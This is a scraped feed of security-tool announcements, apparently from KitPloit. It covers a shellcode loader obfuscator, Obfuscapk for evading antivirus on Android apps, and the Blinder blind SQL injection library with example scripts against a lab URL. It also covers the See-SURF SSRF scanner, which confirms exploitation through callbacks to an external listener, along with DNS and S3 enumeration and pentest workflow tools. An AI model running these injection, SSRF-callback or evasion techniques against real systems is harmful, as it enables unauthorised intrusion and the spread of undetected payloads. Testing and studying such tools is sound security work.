Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5854 articles
Browse latest View live

PythonAESObfuscate - Obfuscates A Python Script And The Accompanying Shellcode

$
0
0

Pythonic way to load shellcode. Builds an EXE for you too!

Usage
  • Place a payload.bin raw shellcode file in the same directory. Default Architecture is x86
  • run python obfuscate.py
  • Default output is out.py

Requirements
  • Windows
  • Python 2.7
  • Pyinstaller
  • PyCrypto (PyCryptodome didn't seem to work)


Kali Linux 2020.1 Release - Penetration Testing and Ethical Hacking Linux Distribution

$
0
0

We are incredibly excited to announce the first release of 2020, Kali Linux 2020.1.

2020.1 includes some exciting new updates:

Non-Root

Throughout the history of Kali (and its predecessors BackTrack, WHAX, and Whoppix), the default credentials have been root/toor. This is no more. We are no longer using the superuser account, root, as default in Kali 2020.1. The default user account is now a standard, unprivileged, user.

root/toor is dead. Long live kali/kali.

NetHunter Images

The mobile pen-testing platform, Kali NetHunter, has also had some new improvements. You are now no longer required to root your phone in order to run Kali NetHunter, but that does come with some limitations.
To suit everybody’s needs, Kali NetHunter now comes in the following three editions:
  • NetHunter– Needs rooted devices with custom recovery and patched kernel. Has no restrictions. Device specific images are available here.
  • NetHunter Light– Needs rooted devices with custom recovery but no custom kernel. Has minor restrictions, i.e. no WiFi injection or HID support. Architecture specific images are available here.
  • NetHunter Rootless– Installable on all stock standard, unmodified devices using Termux. Some limitations, like lack of db support in Metasploit and no root permissions. Installation instruction is available here.

The NetHunter documentation page includes a more detailed comparison.


Upgrade to Kali Linux 2020.1

Existing Upgrades If you already have an existing Kali installation, remember you can always do a quick update:
kali@kali:~$ cat <<EOF | sudo tee /etc/apt/sources.list
deb http://http.kali.org/kali kali-rolling main non-free contrib
EOF
kali@kali:~$
kali@kali:~$ sudo apt update && sudo apt -y full-upgrade
kali@kali:~$
kali@kali:~$ [ -f /var/run/reboot-required ] && sudo reboot -f
kali@kali:~$

You should now be on Kali Linux 2020.1. We can do a quick check by doing:
kali@kali:~$ grep VERSION /etc/os-release
VERSION="2020.1"
VERSION_ID="2020.1"
VERSION_CODENAME="kali-rolling"
kali@kali:~$
kali@kali:~$ uname -v
#1 SMP Debian 5.4.13-1kali1 (2020-01-20)
kali@kali:~$
kali@kali:~$ uname -r
5.4.0-kali3-amd64
kali@kali:~$

NOTE: The output of uname -r may be different depending on architecture.


More info here.


Obfuscapk - A Black-Box Obfuscation Tool For Android Apps

$
0
0

Obfuscapk is a modular Python tool for obfuscating Android apps without needing their source code, since apktool is used to decompile the original apk file and to build a new application, after applying some obfuscation techniques on the decompiled smali code, resources and manifest. The obfuscated app retains the same functionality as the original one, but the differences under the hood sometimes make the new application very different from the original (e.g., to signature based antivirus software).

Demo


Architecture


Obfuscapk is designed to be modular and easy to extend, so it's built using a plugin system. Consequently, every obfuscator is a plugin that inherits from an abstract base class and needs to implement the method obfuscate. When the tool starts processing a new Android application file, it creates an obfuscation object to store all the needed information (e.g., the location of the decompiled smali code) and the internal state of the operations (e.g., the list of already used obfuscators). Then the obfuscation object is passed, as a parameter to the obfuscate method, to all the active plugins/obfuscators (in sequence) to be processed and modified. The list and the order of the active plugins is specified through command line options.
The tool is easily extensible with new obfuscators: it's enough to add the source code implementing the obfuscation technique and the plugin metadata (a <obfuscator-name>.obfuscator file) in the src/obfuscapk/obfuscators directory (take a simple existing obfuscator like Nop as a starting example). The tool will detect automatically the new plugin, so no further configuration is needed (the new plugin will be treated like all the other plugins bundled with the tool).

Installation
There are two ways of getting a working copy of Obfuscapk on your own computer: either by using Docker or by using directly the source code in a Python 3.7 environment. In both cases, the first thing to do is to get a local copy of this repository, so open up a terminal in the directory where you want to save the project and clone the repository:
$ git clone https://github.com/ClaudiuGeorgiu/Obfuscapk.git

Docker image

Prerequisites
This is the suggested way of installing Obfuscapk, since the only requirement is to have a recent version of Docker installed:
$ docker --version             
Docker version 19.03.0, build aeac949

Official Docker Hub image
The official Obfuscapk Docker image is available on Docker Hub (automatically built from this repository):
$ # Download the Docker image.
$ docker pull claudiugeorgiu/obfuscapk
$ # Give it a shorter name.
$ docker tag claudiugeorgiu/obfuscapk obfuscapk

Install
If you downloaded the official image from Docker Hub, you are ready to use the tool so go ahead and check the usage instructions, otherwise execute the following commands in the previously created Obfuscapk/src/ directory (the folder containing the Dockerfile) in order to build the Docker image:
$ # Make sure to run the command in Obfuscapk/src/ directory.
$ # It will take some time to download and install all the dependencies.
$ docker build -t obfuscapk .
When the Docker image is ready, make a quick test to check that everything was installed correctly:
$ docker run --rm -it obfuscapk --help
usage: python3.7 -m obfuscapk.cli [-h] -o OBFUSCATOR [-w DIR] [-d OUT_APK]
...
Obfuscapk is now ready to be used, see the usage instructions for more information.

From source

Prerequisites
Make sure to have apktool, jarsigner and zipalign installed and available from command line:
$ apktool          
Apktool v2.4.0 - a tool for reengineering Android apk files
...
$ jarsigner
Usage: jarsigner [options] jar-file alias
jarsigner -verify [options] jar-file [alias...]
...
$ zipalign
Zip alignment utility
Copyright (C) 2009 The Android Open Source Project
...
To install and use apktool you need a recent version of Java, which should also have jarsigner bundled. zipalign is included in the Android SDK. The location of the executables can also be specified through the following environment variables: APKTOOL_PATH, JARSIGNER_PATH and ZIPALIGN_PATH (e.g., in Ubuntu, run export APKTOOL_PATH=/custom/location/apktool before running Obfuscapk in the same terminal).
Apart from the above tools, the only requirement of this project is a working Python 3.7 installation (along with its package manager pip).

Install
Run the following commands in the main directory of the project (Obfuscapk/) to install the needed dependencies:
$ # Make sure to run the commands in Obfuscapk/ directory.

$ # The usage of a virtual environment is highly recommended, e.g., virtualenv.
$ # If not using virtualenv (https://virtualenv.pypa.io/), skip the next 2 lines.
$ virtualenv -p python3.7 venv
$ source venv/bin/activate

$ # Install Obfuscapk's requirements.
$ python3.7 -m pip install -r src/requirements.txt
After the requirements are installed, make a quick test to check that everything works correctly:
$ cd src/
$ # The following command has to be executed always from Obfuscapk/src/ directory
$ # or by adding Obfuscapk/src/ directory to PYTHONPATH environment variable.
$ python3.7 -m obfuscapk.cli --help
usage: python3.7 -m obfuscapk.cli [-h] -o OBFUSCATOR [-w DIR] [-d OUT_APK]
...
Obfuscapk is now ready to be used, see the usage instructions for more information.

Usage
From now on, Obfuscapk will be considered as an executable available as obfuscapk, so you need to adapt the commands according to how you installed the tool:
  • Docker image: a local directory containing the application to obfuscate has to be mounted to /workdir in the container (e.g., the current directory "${PWD}"), so the command:
    $ obfuscapk [params...]
    becomes:
    $ docker run --rm -it -u $(id -u):$(id -g) -v "${PWD}":"/workdir" obfuscapk [params...]
  • From source: every instruction has to be executed from the Obfuscapk/src/ directory (or by adding Obfuscapk/src/ directory to PYTHONPATH environment variable) and the command:
    $ obfuscapk [params...]
    becomes:
    $ python3.7 -m obfuscapk.cli [params...]
Let's start by looking at the help message:
$ obfuscapk --help
obfuscapk [-h] -o OBFUSCATOR [-w DIR] [-d OUT_APK] [-i] [-p] [-k VT_API_KEY] <APK_FILE>
There are two mandatory parameters: <APK_FILE>, the path (relative or absolute) to the apk file to obfuscate and the list with the names of the obfuscation techniques to apply (specified with the -o option, e.g., -o Rebuild -o NewSignature -o NewAlignment). The other optional arguments are as follows:
  • -w DIR is used to set the working directory where to save the intermediate files (generated by apktool). If not specified, a directory named obfuscation_working_dir is created in the same directory as the input application. This can be useful for debugging purposes, but if it's not needed it can be set to a temporary directory (e.g., -w /tmp/).
  • -d OUT_APK is used to set the path of the destination file: the apk file generated by the obfuscation process (e.g., -d /home/user/Desktop/obfuscated.apk). If not specified, the final obfuscated file will be saved inside the working directory. Note: existing files will be overwritten without any warning.
  • -i is a flag for ignoring known third party libraries during the obfuscation, in order to use less resources, to increase performances and to reduce the risk of errors. The list of libraries to ignore is adapted from LiteRadar project.
  • -p is a flag for showing progress bars during the obfuscation operations. When using the tool in batch operations/automatic builds it's convenient to have progress bars disabled, otherwise this flag should be enabled to see the obfuscation progress.
  • -k VT_API_KEY is needed only when using VirusTotal obfuscator, to set the API key(s) to be used when communicating with Virus Total. Can be set multiple times to cycle through the API keys during the requests (e.g., -k VALID_VT_KEY_1 -k VALID_VT_KEY_2).
Let's consider now a simple working example to see how Obfuscapk works:
$ # original.apk is a valid Android apk file.
$ obfuscapk -o RandomManifest -o Rebuild -o NewSignature -o NewAlignment original.apk
When running the above command, this is what happens behind the scenes:
  • since no working directory was specified, a new working directory (obfuscation_working_dir) is created in the same location as original.apk (this can be useful to inspect the smali files/manifest/resources in case of errors)
  • some checks are performed in order to make sure that all the needed files/executables are available
  • the actual obfuscation process begins: the specified obfuscators are executed (in order) one by one until there's no obfuscator left or until an error is encountered
    • when running the first obfuscator, original.apk is decompiled with apktool and the results are stored into the working directory
    • since the first obfuscator is RandomManifest, the entries in the decompiled Android manifest are reordered randomly (without breaking the xml structures)
    • Rebuild obfuscator simply rebuilds the application (now with the modified manifest) using apktool, and since no output file was specified, the resulting apk file is saved in the working directory created before
    • NewSignature obfuscator signs the newly created apk file with a custom certificate contained in this keystore
    • NewAlignment obfuscator uses zipalign tool to align the resulting apk file
  • when all the obfuscators have been executed without errors, the resulting obfuscated apk file can be found in obfuscation_working_dir/original_obfuscated.apk, signed, aligned and ready to be installed into a device/emulator
As seen in the previous example, Rebuild, NewSignature and NewAlignment obfuscators are always needed to complete an obfuscation operation, in order to build the final obfuscated apk. They are not actual obfuscation techniques, but they are needed in the build process and so they are included in the list of obfuscators to keep the overall architecture modular.

Obfuscators
The obfuscators included in Obfuscapk can be divided into different categories, depending on the operations they perform:
  • Trivial: as the name suggests, this category includes simple operations (that do not modify much the original application), like signing the apk file with a new signature.
  • Rename: operations that change the names of the used identifiers (classes, fields, methods).
  • Encryption: packaging encrypted code/resources and decrypting them during the app execution. When Obfuscapk starts, it automatically generates a random secret key (32 characters long, using ASCII letters and digits) that will be used for encryption.
  • Code: all the operations that involve the modification of the decompiled source code.
  • Resources: operations on the resource files (like modifying the manifest).
  • Other
The obfuscators currently bundled with Obfuscapk are briefly presented below (in alphabetical order). Please refer to the code for more details.
NOTE: not all the obfuscators below correspond to real obfuscation techniques (e.g., Rebuild, NewSignature, NewAlignment and VirusTotal), but they are implemented as obfuscators in order to keep the architecture modular and easy to extend with new functionality.

AdvancedReflection [Code]
Uses reflection to invoke dangerous APIs of the Android Framework. In order to find out if a method belongs to the Android Framework, Obfuscapk refers to the mapping discovered by Backes et al.

ArithmeticBranch [Code]
Insert junk code. In this case, the junk code is composed by arithmetic computations and a branch instruction depending on the result of these computations, crafted in such a way that the branch is never taken.

AssetEncryption [Encryption]
Encrypt asset files.

CallIndirection [Code]
This technique modifies the control-flow graph without impacting the code semantics: it adds new methods that invoke the original ones. For example, an invocation to the method m1 will be substituted by a new wrapper method m2, that, when invoked, it calls the original method m1.

ClassRename [Rename]
Change the package name and rename classes (even in the manifest file).

ConstStringEncryption [Encryption]
Encrypt constant strings in code.

DebugRemoval [Code]
Remove debug information.

FieldRename [Rename]
Rename fields.

Goto [Code]
Given a method, it inserts a goto instruction pointing to the end of the method and another goto pointing to the instruction after the first goto; it modifies the control-flow graph by adding two new nodes.

LibEncryption [Encryption]
Encrypt native libs.

MethodOverload [Code]
It exploits the overloading feature of the Java programming language to assign the same name to different methods but using different arguments. Given an already existing method, this technique creates a new void method with the same name and arguments, but it also adds new random arguments. Then, the body of the new method is filled with random arithmetic instructions.

MethodRename [Rename]
Rename methods.

NewAlignment [Trivial]
Realign the application.

NewSignature [Trivial]
Re-sign the application with a new custom signature.

Nop [Code]
Insert junk code. Nop, short for no-operation, is a dedicated instruction that does nothing. This technique just inserts random nop instructions within every method implementation.

RandomManifest [Resource]
Randomly reorder entries in the manifest file.

Rebuild [Trivial]
Rebuild the application.

Reflection [Code]
This technique analyzes the existing code looking for method invocations of the app, ignoring the calls to the Android framework (see AdvancedReflection). If it finds an instruction with a suitable method invocation (i.e., no constructor methods, public visibility, enough free registers, etc.) such invocation is redirected to a custom method that will invoke the original method using the Reflection APIs.

Reorder [Code]
This technique consists of changing the order of basic blocks in the code. When a branch instruction is found, the condition is inverted (e.g., branch if lower than, becomes branch if greater or equal than) and the target basic blocks are reordered accordingly. Furthermore, it also randomly re-arranges the code abusing goto instructions.

ResStringEncryption [Encryption]
Encrypt strings in resources (only those called inside code).

VirusTotal [Other]
Send the original and the obfuscated application to Virus Total. You must provide the VT API key (see -k option).

Credits

This software was developed for research purposes at the Computer Security Lab (CSecLab), hosted at DIBRIS, University of Genoa.

Team


Blinder - A Python Library To Automate Time-Based Blind SQL Injection

$
0
0

Blidner is a small python library to automate time-based blind SQL injection by using a pre defined queries as a functions to automate a rapid PoC development.

Installation
You can install Blinder using the following command:
pip install blinder
Or by downloading the source and importing it manually to your project.

Usage
To use blinder you need to import Blinder module then start using the main functions of Blinder.
You can use Blinder "with the current version" to do the following:
  • Check for time based injection.
  • Get database name.
  • Get tables names.
You can check for injection in a URL using the following code:
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)

print blind.check_injection()
The execution result will be:
root@kali:~/Desktop# python check.py
True
root@kali:~/Desktop#
You can Get database name using the following code:
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)

print "Database name is : %s " % blind.get_database()
And the results will be:
root@kali:~/Desktop# python get-database.py
Database name is : db1
root@kali:~/Desktop#
To get tables names you can use the following code:
#!/usr/bin/python

import Blinder

blind = Blinder.blinder(
"http://sqli-lab/sql_injection/index.php?search=3",
sleep=1
)

tables = blind.get_tables()

for table in tables:
print table
And the results will be:
root@kali:~/Desktop# python get-tables.py
blogs
notes
root@kali:~/Desktop#

TODO
A lot of features should be added soon like:
  • the ability of adding customized query
  • test injection points based on burp request
  • extract tables/columns data


See-SURF - Python Based Scanner To Find Potential SSRF Parameters

$
0
0

A Python based scanner to find potential SSRF parameters in a web application.

Motivation
SSRF being one of the critical vulnerabilities out there in web, I see there was no tool which would automate finding potential vulnerable parameters. See-SURF can be added to your arsenal for recon while doing bug hunting/web security testing.

Tech/framework used
Built with
  • Python3

Features
  1. Takes burp's sitemap as input and parses and parses the file with a strong regex matches any GET/POST URL parameters containing potentially vulnerable SSRF keywords like URL/website etc. Also, checks the parameter values for any URL or IP address passed. Examples GET request -
    google.com/url=https://yahoo.com
    google.com/q=https://yahoo.com
    FORMS -
    <input type="text" name="url" value="https://google.com" placeholder="https://msn.com">
  2. Multi-threaded In-built crawler to run and gather as much data as possible to parse and identify potentially vulnerable SSRF parameters.
  3. Supply cookies for an authenticated scanning.
  4. By default, normal mode is On, with a verbose switch you would see the same vulnerable param in different endpoints. The same parameter may not be sanitized at all places. But verbose mode generates a lot of noise. Example:
    https://google.com/path/1/urlToConnect=https://yahoo.com
    https://google.com/differentpath/urlToConnect=https://yahoo.com
  5. Exploitation - Makes an external request to burp collaborator or any other http server with the vulnerable parameter to confirm the possibility of SSRF.

How to use?
[-] This would run with default threads=10, no cookies/session and NO verbose mode
python3 see-surf.py -H https://www.google.com
[-] Space separate Cookies can be supplied for an authenticated session crawling
python3 see-surf.py -H https://www.google.com -c cookie_name1=value1 cookie_name2=value2
[-] Supplying no. of threads and verbose mode (Verbose Mode Is Not Recommended If You Don't Want To Spend Longer Time But The Possibility Of Bug Finding Increases)
python3 see-surf.py -H https://www.google.com -c cookie_name1=value1 cookie_name2=value2 -t 20 -v
By Default, normal mode is On, with verbose switch you would see the same potential vulnerable param in different endpoints. (Same parameter may not be sanitized at all places. But verbose mode generates a lot of noise.)
Example:
https://google.com/abc/1/urlToConnect=https://yahoo.com
https://google.com/123/urlToConnect=https://yahoo.com

Version-2 (Best Recommended)
Burp Sitemap (-b switch) & Connect back automation ( -p switch )

Complete Command would look like this -
python3 see-surf.py -H https://www.google.com -c cookie_name1=value1 cookie_name2=value2 -b burp_file.xml -p http://72.72.72.72:8000
[-] -b switch Provide burp sitemap files for a better discovery of potential SSRF parameters. The script would first parse the burp file and try to identify potential params and then run the built in crawler on it

Browser the target with your burpsuite running at the background, make some GET/POST requests, the more the better. Then go to target, right click-> "Save selected Items" and save it. Provide to the script as follows.
python3 see-surf.py -H https://www.google.com -c cookie_name1=value1 cookie_name2=value2 -b burp_file.xml


[-] -p switch Fire up burpsuite collaborator and pass the host with -p parameter Or start a simple python http server and wait for the vulnerable param to execute your request. (Highly Recommended)
(This basically helps in exploiting GET requests, for POST you would need to try to exploit it manually)
Payload will get executed with the param at the end of the string so its easy to identify which one is vulnerable. For example: http://72.72.72.72:8000/vulnerableparam
python3 see-surf.py -H https://www.google.com -c cookie_name1=value1 cookie_name2=value2 -p http://72.72.72.72:8000


Installation
git clone https://github.com/In3tinct/See-SURF.git
cd See-SURF/
pip3 install BeautifulSoup4
pip3 install requests

Tests
A basic framework has been created. More tested would be added to reduce any false positives.

Credits
Template - https://gist.github.com/akashnimare/7b065c12d9750578de8e705fb4771d2f
Some regexes from https://www.regextester.com/

Future Extensions
  • Include more places to look for potential params like Javascript files
  • Finding potential params during redirection.
  • More conditions to avoid false positives.
  • Exploitation.


S3Enum - Fast Amazon S3 Bucket Enumeration Tool For Pentesters

$
0
0

s3enum is a tool to enumerate a target's Amazon S3 buckets. It is fast and leverages DNS instead of HTTP, which means that requests don't hit AWS directly.
It was originally built back in 2016 to target GitHub.

Installation

Binaries
Find the binaries on the Releases page.

Go
go get github.com/koenrh/s3enum

Usage
You need to specify the base name of the target (e.g. hackerone), and a word list. You could either use the example wordlist.txt file from this repository, or get a word list elsewhere. Optionally, you could specify the number of threads (defaults to 10).
$ s3enum --wordlist examples/wordlist.txt --suffixlist examples/suffixlist.txt --threads 10 hackerone

hackerone
hackerone-attachment
hackerone-attachments
hackerone-static
hackerone-upload
By default s3enum will use the name server as specified in /etc/resolv.conf. Alternatively, you could specify a different name server using the --nameserver option. Besides, you could test multiple names at the same time.
s3enum \
--wordlist examples/wordlist.txt \
--suffixlist examples/suffixlist.txt \
--nameserver 1.1.1.1 \
hackerone h1 roflcopter


MassDNS - A High-Performance DNS Stub Resolver For Bulk Lookups And Reconnaissance (Subdomain Enumeration)

$
0
0

MassDNS is a simple high-performance DNS stub resolver targetting those who seek to resolve a massive amount of domain names in the order of millions or even billions. Without special configuration, MassDNS is capable of resolving over 350,000 names per second using publicly available resolvers.

Major changes
This version of MassDNS is currently experimental. In order to speed up the resolving process, the ldns dependency has been replaced by a custom stack-based DNS implementation (which currently only supports the text representation of the most common DNS records). Furthermore, epoll has been introduced in order to lighten CPU usage when operating with a low concurrency which may have broken compatibility with some platforms. In case of bugs, please create an issue and switch to the more mature version 0.2.
Also note that the command line interface has changed slightly due to criticism of the output complexity. Additionally, the default values of the -s and -i parameters have been changed. The repository structure has been changed as well.

Contributors

Compilation
Clone the git repository and cd into the project root folder. Then run make to build from source. If you are not on Linux, run make nolinux. On Windows, the Cygwin packages gcc-core, git and make are required.

Usage
Usage: ./bin/massdns [options] [domainlist]
-b --bindto Bind to IP address and port. (Default: 0.0.0.0:0)
--busy-poll Use busy-wait polling instead of epoll.
-c --resolve-count Number of resolves for a name before giving up. (Default: 50)
--drop-group Group to drop privileges to when running as root. (Default: nogroup)
--drop-user User to drop privileges to when running as root. (Default: nobody)
--flush Flush the output file whenever a response was received.
-h --help Show this help.
-i --interval Interval in milliseconds to wait between multiple resolves of the same
domain. (Default: 500)
-l --error-log Error log file path. (Default: /dev/stderr)
--norecurse Use non-recursive queries. Useful for DNS cache snooping.
-o --output Flags for output formatting.
--predictable Use resolvers incrementally. Useful for resolver tests.
--processes Number of processes to be used for resolving. (Default: 1)
-q --quiet Quiet mode.
--rcvbuf Size of the receive buffer in bytes.
--retry Unacceptable DNS response codes. (Default: REFUSED)
-r --resolvers Text file containing DNS resolvers.
--root Do not drop privileges when running as root. Not recommended.
-s --hashmap-size Number of concurrent lookups. (Default: 10000)
--sndbuf Size of the send buffer in bytes.
--sticky Do not switch the resolver when retrying.
--socket-count Socket count per process. (Default: 1)
-t --type Record type to be resolved. (Default: A)
--verify-ip Verify IP addresses of incoming replies.
-w --outfile Write to the specified output file instead of standard output.

Output flags:
S - simple text output
F - full text output
B - binary output
J - ndjson output
This overview may be incomplete. For more options, especially concerning output formatting, use --help.

Example
Resolve all AAAA records from domains within domains.txt using the resolvers within resolvers.txt in lists and store the results within results.txt:
$ ./bin/massdns -r lists/resolvers.txt -t AAAA domains.txt > results.txt
This is equivalent to:
$ ./bin/massdns -r lists/resolvers.txt -t AAAA -w results.txt domains.txt

Example output
By default, MassDNS will output response packets in text format which looks similar to the following:
;; Server: 77.41.229.2:53
;; Size: 93
;; Unix time: 1513458347
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 51298
;; flags: qr rd ra ; QUERY: 1, ANSWER: 1, AUTHORITY: 2, ADDITIONAL: 0

;; QUESTION SECTION:
example.com. IN A

;; ANSWER SECTION:
example.com. 45929 IN A 93.184.216.34

;; AUTHORITY SECTION:
example.com. 24852 IN NS b.iana-servers.net.
example.com. 24852 IN NS a.iana-servers.net.
The resolver IP address is included in order to make it easier for you to filter the output in case you detect that some resolvers produce bad results.

Resolving
The repository includes the file resolvers.txt consisting of a filtered subset of the resolvers provided by the subbrute project. Please note that the usage of MassDNS may cause a significant load on the used resolvers and result in abuse complaints being sent to your ISP. Also note that the provided resolvers are not guaranteed to be trustworthy. The resolver list is currently outdated with a large share of resolvers being dysfunctional.
MassDNS's DNS implementation is currently very sporadic and only supports the most common records. You are welcome to help changing this by collaborating.

PTR records
MassDNS includes a Python script allowing you to resolve all IPv4 PTR records by printing their respective queries to the standard output.
$ ./scripts/ptr.py | ./bin/massdns -r lists/resolvers.txt -t PTR -w ptr.txt
Please note that the labels within in-addr.arpa are reversed. In order to resolve the domain name of 1.2.3.4, MassDNS expects 4.3.2.1.in-addr.arpa as input query name. As a consequence, the Python script does not resolve the records in an ascending order which is an advantage because sudden heavy spikes at the name servers of IPv4 subnets are avoided.

Reconnaissance by brute-forcing subdomains
Perform reconnaissance scans responsibly and adjust the -s parameter to not overwhelm authoritative name servers.
Similar to subbrute, MassDNS allows you to brute force subdomains using the included subbrute.py script:
$ ./scripts/subbrute.py lists/names.txt example.com | ./bin/massdns -r lists/resolvers.txt -t A -o S -w results.txt
As an additional method of reconnaissance, the ct.py script extracts subdomains from certificate transparency logs by scraping the data from crt.sh:
$ ./scripts/ct.py example.com | ./bin/massdns -r lists/resolvers.txt -t A -o S -w results.txt
The files names.txt and names_small.txt, which have been copied from the subbrute project, contain names of commonly used subdomains. Also consider using Jason Haddix' subdomain compilation with over 1,000,000 names.

Security
MassDNS does not require root privileges and will therefore drop privileges to the user called "nobody" by default when being run as root. If the user "nobody" does not exist, MassDNS will refuse execution. In this case, it is recommended to run MassDNS as another non-privileged user. The privilege drop can be circumvented using the --root argument which is not recommended. Also note that other branches than master should not be used in production at all.

Practical considerations

Performance tuning
MassDNS is a simple single-threaded application designed for scenarios in which the network is the bottleneck. It is designed to be run on servers with high upload and download bandwidths. Internally, MassDNS makes use of a hash map which controls the concurrency of lookups. Setting the size parameter -s hence allows you to control the lookup rate. If you are experiencing performance issues, try adjusting the -s parameter in order to obtain a better success rate.

Rate limiting evasion
In case rate limiting by IPv6 resolvers is a problem, have a look at the freebind project including packetrand, which will cause each packet to be sent from a different IPv6 address from a routed prefix.

Result authenticity
If the authenticity of results is highly essential, you should not rely on the included resolver list. Instead, set up a local unbound resolver and supply MassDNS with its IP address. In case you are using MassDNS as a reconnaissance tool, you may wish to run it with the default resolver list first and re-run it on the found names with a list of trusted resolvers in order to eliminate false positives.

Todo
  • Prevent flooding resolvers which are employing rate limits or refusing resolves after some time
  • Implement bandwidth limits
  • Employ cross-resolver checks to detect DNS poisoning and DNS spam (e.g. Level 3 DNS hijacking)
  • Add wildcard detection for reconnaissance
  • Improve reconnaissance reliability by adding a mode which re-resolves found domains through a list of trusted (local) resolvers in order to eliminate false positives
  • Detect optimal concurrency automatically
  • Parse the command line properly and allow the usage/combination of short options without spaces


RiskAssessmentFramework - Static Application Security Testing

$
0
0

The OWASP Risk Assessment Framework consist of Static application security testing and Risk Assessment tools, Eventhough there are many SAST tools available for testers, but the compatibility and the Environement setup process is complex. By using OWASP Risk Assessment Framework's Static Appilication Security Testing tool Testers will be able to analyse and review their code quality and vulnerabilities without any additional setup. OWASP Risk Assessment Framework can be integrated in the DevSecOps toolchain to help developers to write and produce secure code.

features
  • Remote Web Deface Detection (Optional)
  • Static Application security Testing

Web Deface Detection

Web Deface Detection Installation
  • cd web_deface/
  • pip install -r requirements.txt
  • python web_deface.py <notif arguments>
  • For more detailed information, refer to the user guide
    we have update related web deface detection please see video Youtube

Static Application security Testing (Under Develoment)
  • For more detailed information, refer to the user guide

Demo RAF SAST Tool



Contribute
wanna contribute this project dm me via twitter @johnleedik

Project Lead



Project-Black - Pentest/BugBounty Progress Control With Scanning Modules

$
0
0

Scope control, scope scanner and progress tracker for easier working on a bug bounty or pentest project.

What is this tool for?
The tools encourages more methodical work on pentest/bugbounty, tracking the progress and general scans information.
It can launch
  • masscan
  • nmap
  • dirsearch
  • amass
  • patator
against the scope you work on and store the data in a handy form. Perform useful filtering of the project's data, for instance:
  • find me all hosts, which have open ports, but not 80
  • find me all hosts, whose ips start with 82.
  • find me hosts where dirsearch has found at least 1 file with 200 status code

Installation
Basic setup via docker-compose will run on any system which has docker and docker-compose dependency
If you don't have docker installed then

Docker for Ubuntu/Debian
sudo apt install docker.io

Tool installation
If you have docker set up, then for Ubuntu/Debian simply
sudo curl -L "https://github.com/docker/compose/releases/download/1.23.1/docker-compose-$(uname -s)-$(uname -m)" -o /usr/local/bin/docker-compose
sudo chmod +x /usr/local/bin/docker-compose
git clone https://github.com/c0rvax/project-black
cd project-black
sudo docker-compose up
If you see some SQL errors, try stopping docker-compose (Ctrl + C once and wait for nice shutdown) and run docker-compose up
This might take some time but that's it! Other distros should have very similar guidance.
Now head to http://localhost:5000, enter the credentials. They can be found in https://github.com/c0rvax/project-black/blob/master/config/config_docker.yml under application
For a more complex setup or something failed, see the wiki.

Resources notice
None of the docker containers restrict the amount of resources usage, you are on your own here, however, you can change the amount of parallel tasks for each worker separately. See the wiki for that

How to work?
After a setup, create a project and head to the respective page.


Now we will follow the basic steps which you can do within the application

Add scope
Let's say we are assessing hackerone.com and all it's subdomains. Write hackerone.com into the add scope field and press Add to scope


Entrypoint has been added.
There are other ways to add scope, see wiki

Quick note on working
All of the tasks can read parameters from the user, however, lauching with some options won't diplay any new result as it is pretty difficult to parse all possible outputs of a program. So to start, try working duplicating the options from this manual.
Available options can be found on this page

Start amass
Click the blue button Launch task.


A popup with parameters will appear.


It is recommended to click the All_top_level_domains check box and in argv enter -ip and click Fire! button.


This would launch amass -d hackerone.com -ip. Note that in this case we did not specify any domain. This is beacause the All_top_level_domains check box means looking into the scope which is stored in the database. So the program sees that hackerone.com was added to the scope and launches amass against it.
Upon finishing, the new data is automatically added to scope.

Start masscan and nmap
Now head to IPs tab. Click the already known button Launch task and choose masscan.
We will launch a quick scan, using the button Top N ports. This autocompletes the argv parameter. Press Fire!


Results are automatically downloaded from the database.


Now click Launch task and choose nmap only open. This will find all the open ports which exist in the database and run nmap only against them.
Click Banner and Fire.


Detected banner will automatically appear


Launching dirsearch
Launch dirsearch against all ips and all open ports (both HTTP and HTTPS would be tried)
On IPs tab click Launch task and select dirsearch. Fill in extenstions you want to try and click Fire!
You can launch dirseach agains hosts (not ips) on the Hosts tab.

Note on dirsearch
If there are no ports, dirsearch won't even start. So first, make sure you launched nmap or masscan to discover open ports.

Inspecting results
There are generally three ways to check the results:
  • IPs/Hosts list
  • IP/Host details
  • Dirsearch list

IPs and Hosts list
Those are two tabs. They work the same way so we will stop on Hosts.


You can see a list of hosts, their ports and files. Also you can edit a comment for that host.
Important part here is filtering box.


You can aggregate different filters using the field shown above. Type the filter you want (there is a helper for that) and press Shift + Enter


IP/Host details
You can also view details on a specific host or ip. Press button with the glasses


There you will see dirsearch result for every open port on that host

Dirsearch list
Dirsearch list button will open a new window showing all found files for every dirsearch which was launched in this project.

Launching tasks against specific scope
IPs and Hosts Launch task are different! The button on IPs page will start against all ips within the current project, meanwhile the button on the Hosts page will launch against hosts.
To launch a task against some hosts, you should
  1. Filter the hosts
  2. Launch the task
Example:


Some filters have been applied. If we now launch dirsearch, it will be launched against hosts which correspond to the used filters.


GDA Android Reversing Tool - A New Decompiler Written Entirely In C++, So It Does Not Rely On The Java Platform, Which Is Succinct, Portable And Fast, And Supports APK, DEX, ODEX, Oat

$
0
0
Here, a new Dalvik bytecode decompiler, GDA(this project started in 2013 and released its first version 1.0 in 2015 at www.gda.com: 9090) , is proposed and implemented in C++ to provide more sophisticated, fast and convenient decompilation support. GDA is completely self-independent and very stable. It supports APK, DEX, ODEX, oat files, and run without installation and Java VM support. GDA only takes up 2M of your disk space, and you can use it in any newly installed windows system and virtual machine system without additional configuration. In addition, GDA has more excellent features as follows:


Interactive operation:
1.cross-references for strings, classes, methods and fields;
2.searching for strings, classes methods and fields;
3.comments for java code;
4.rename for methods,fields and classes;
5.save the analysis results in gda db file.
...

Utilities for Assisted Analysis:
1.extracting DEX from ODEX;
2.extracting DEX from OAT;
3.XML Decoder;
4.algorithm tool;
5.device memory dump;
...

New features:
1.Brand new dalvik decompiler in c++ with friendly GUI;
2.Support python script
3.packers Recognition;
4.Multi-DEX supporting;
5.making and loading signature of the method
6.Malicious Behavior Scanning by API chai ns;
7.taint analysis to preview the behavior of variables;
8.taint analysis to trace the path of variables;
9.de-obfuscate;
10.API view with x-ref;
11.Association of permissions with modules;
...
GDA shortcut key
shortcutdescription
F5Switch java to smali, pressing it again for back to java
FTrace the args and return value by dataflow analysis
